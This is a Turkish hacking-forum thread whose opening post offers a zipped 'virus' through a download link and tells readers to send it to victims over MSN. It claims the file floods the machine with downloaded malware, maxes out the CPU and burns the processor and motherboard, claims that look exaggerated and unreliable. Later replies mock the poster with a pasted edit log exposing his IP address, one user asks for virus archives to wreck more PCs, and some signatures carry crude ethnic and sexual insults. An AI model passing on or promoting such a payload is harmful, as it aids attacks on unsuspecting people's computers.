Tek Tıkla Binlerce Virüs Girsin

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Zuibatsu
    Zuibatsu's avatar
    Erkek
    bu virüs ne işe yarıyor derseniz; bu virüs msn de karsı tarafa zipli dosya olarak gönderiyoruz kurban bu dosyayı açınca milyonlarca internetten virüs dosyası indiriyor ve bunu kapatmaya imkan yok ctrl+alt+delete yapsanız bile kar etmiyor,ctrl+alt+delete yapıp performansı açıp bi bakın işlemci performansı %100 lere çıkıyor bu virüsün amacı açtıgınız bilgisayarda 10 dk. dan fazla bekleyın ve bilgisayarı kapatın ve tekrar açın açılmayacak
    kullanması çok basit zipli dosyayı klasöre çıkartıyorsunuz ve klasörü açıyorsunuz Untitled-1 bu programa fare (mause) çift tıklıyorsunuz ama sizin tıklamamanız daha iyi olur.çünkü tıkladıgınız an milyonlarca internetten virüs dosyası açıyor.makinenizin özellikleri düşükse pc 8 dk. içinde kapanıyor ve bidaha açılmıyor.bunun sebebide işlemci yanıyor anakarta da zarar veriyor.

dowload
    http://rapidshare.de/files/11577198/virues.zip.html

Tecavüzden Kaçış Yoksa Tadını Çıkar...
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    renegadealien
    renegadealien's avatar
    Üstün Hizmet Madalyası Savaş Madalyası Başarı Madalyası Üstün Hizmet Madalyası Developer Madalyası
    Erkek
    işlemci kullanımı %1000 lere cıkamaz hoca :)

Sanıyorum kendi atasözümü yaptım, kaynak belirterek kullanabilirsiniz. 10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Not : Söyleyeni belli olduğu için(Ben) atasözü değil, özlüsöz oluyormuş, dolayısı ile kendi özlüsözümü yapmış oldum :)
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Lupin
    Lupin's avatar
    Erkek
    Afedersin ama Rene abi orada şöyle yazıyor :)
    "ctrl+alt+delete yapıp performansı açıp bi bakın işlemci performansı %100 lere çıkıyor "

Rus ile aldatmayanı etmeli takdir,tek biri ile uslanmayanın hakkı köçektir.
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    BuZuL
    BuZuL's avatar
    Erkek
    olmaz beni etkilemez böle basit şeyler nie çünkim linuxtayım :D milyon deil 1 tane bilenek virüs girmez bu proğramdan :D

milyonlarca virüse ne gerek var yav adam akıllı 5 virüs yeterli :D

DAĞDA ÜÇ BEŞ KOYUN SÜRÜSÜ, TUTTURMUŞ BİR KÜRDİSTAN TÜRKÜSÜ, ELİNE ALMIŞ BAYRAK DİYE BİR MASA ÖRTÜSÜ, SATSAN BEŞ PARA ETMEZ NE DİRİSİ NE DE ÖLÜSÜ, SOYU SOYSUZ OLAN SENSİN TOPRAK SENİN NEYİNE, İTE İTLİK YAPIP KAFA TUTMA BEYİNE, ANLASA DEDİĞİMİ SOKAKTAKİ KÖPEK AĞLAR HALİNE, DUY ULAN SOYSUZ NE MUTLU TÜRKÜM DİYENE.......
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    renegadealien
    renegadealien's avatar
    Üstün Hizmet Madalyası Savaş Madalyası Başarı Madalyası Üstün Hizmet Madalyası Developer Madalyası
    Erkek
    Nedense loglar; önce senin %1000 yazdığını, sonra ben yazdıktan sonra %100 e çektiğini söylüyor...

Kimi kandırıon lan zibidi...

--------------------------------
    forumnewtopic.asp:85.99.69.225
    F:subject==>tek týkla binlerce virüs girsin
    selectMode==>1
    message==>bu virüs ne iþe yarýyor derseniz; bu virüs msn de karsý tarafa zipli dosya olarak gönderiyoruz kurban bu dosyayý açýnca milyonlarca internetten virüs dosyasý indiriyor ve bunu kapatmaya imkan yok ctrl+alt+delete yapsanýz bile kar etmiyor,ctrl+alt+delete yapýp performansý açýp bi bakýn iþlemci performansý %1000 lere çýkýyor bu virüsün amacý açtýgýnýz bilgisayarda 10 dk. dan fazla bekleyýn ve bilgisayarý kapatýn ve tekrar açýn açýlmayacak
    kullanmasý çok basit zipli dosyayý klasöre çýkartýyorsunuz ve klasörü açýyorsunuz Untitled-1 bu programa fare (mause) çift týklýyorsunuz ama sizin týklamamanýz daha iyi olur.çünkü týkladýgýnýz an milyonlarca internetten virüs dosyasý açýyor.makinenizin özellikleri düþükse pc 8 dk. içinde kapanýyor ve bidaha açýlmýyor.bunun sebebide iþlemci yanýyor anakarta da zarar veriyor.

dowload
    Submit==>Gönder
    sig==>ON
    topfolderid==>73
    formaction==>go
    C:savepwd==>dontsave

------------------------------------

forumedittopic.asp:85.99.69.225
    F:bolum==>73
    Submit==>Gönder
    action==>go
    subject==>tek týkla binlerce virüs girsin
    selectMode==>1
    message==>bu virüs ne iþe yarýyor derseniz; bu virüs msn de karsý tarafa zipli dosya olarak gönderiyoruz kurban bu dosyayý açýnca milyonlarca internetten virüs dosyasý indiriyor ve bunu kapatmaya imkan yok ctrl+alt+delete yapsanýz bile kar etmiyor,ctrl+alt+delete yapýp performansý açýp bi bakýn iþlemci performansý %100 lere çýkýyor bu virüsün amacý açtýgýnýz bilgisayarda 10 dk. dan fazla bekleyýn ve bilgisayarý kapatýn ve tekrar açýn açýlmayacak
    kullanmasý çok basit zipli dosyayý klasöre çýkartýyorsunuz ve klasörü açýyorsunuz Untitled-1 bu programa fare (mause) çift týklýyorsunuz ama sizin týklamamanýz daha iyi olur.çünkü týkladýgýnýz an milyonlarca internetten virüs dosyasý açýyor.makinenizin özellikleri düþükse pc 8 dk. içinde kapanýyor ve bidaha açýlmýyor.bunun sebebide iþlemci yanýyor anakarta da zarar veriyor.

dowload
    sig==>ON
    folderid==>33314
    C:savepwd==>dontsave

Sanıyorum kendi atasözümü yaptım, kaynak belirterek kullanabilirsiniz. 10.05.2013 tarihli google arama sonucu : Aradığınız - "herşeyin hayırlısı rampanın bayırlısı" - ile ilgili hiçbir arama sonucu mevcut değil. Not : Söyleyeni belli olduğu için(Ben) atasözü değil, özlüsöz oluyormuş, dolayısı ile kendi özlüsözümü yapmış oldum :)
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    zervalone
    zervalone's avatar
    Erkek
    tahribat yaşıyo diyodum inanmıyodunuz
    o ne biçim loglamadır öyle :D
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    noel_baba
    noel_baba's avatar
    Erkek
    rene hocadan uçan sinek kurtulamamış ..in olmadan cin çarpmaya mı çalışıyon len ..tosbağa :)

Kral nerde diye Sorma. SENde ..BENde ..SİZde ..Onda Çıplak giyen kral olur ..Taç giyen oturur tahtına::. Emeğe Saygı ..kürtaja hayır!! Soruya bak: Dünyaya Tekrar Gelseniz Ne Yaparsınız ? E dedim ben; Eminim herkez yine aynı şeyi yapar aynı şeyi yaşardı... Hani sözüm ona; ..Ben siktiğim eşşeğin huyunu bilmem mi? die ...E sen söyle bilmem mi usta :)
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    maganda
    maganda's avatar
    Erkek
    burda mors olan bi arkadaş var inşallah başka sefere :D zuıcim
  9. KısayolKısayol reportŞikayet pmÖzel Mesaj
    WebCrow
    WebCrow's avatar
    Erkek
    abi değiştirdiysen edit yazcan bi zahmet
  10. KısayolKısayol reportŞikayet pmÖzel Mesaj
    turuncu
    turuncu's avatar
    Erkek
    0 ları boş bulunca kaptırmıs kendini sağdan kapatmıs gidiyo
  11. KısayolKısayol reportŞikayet pmÖzel Mesaj
    qertenqelex
    qertenqelex's avatar
    Erkek
    yaa hajılar benim elimde3 böle bi ton vürüs var da işe yarıyomu emin deilim ama sağlam virüs arsıvı olan varsa paylassın daha çok pc ucurcaz
Toplam Hit: 4183 Toplam Mesaj: 16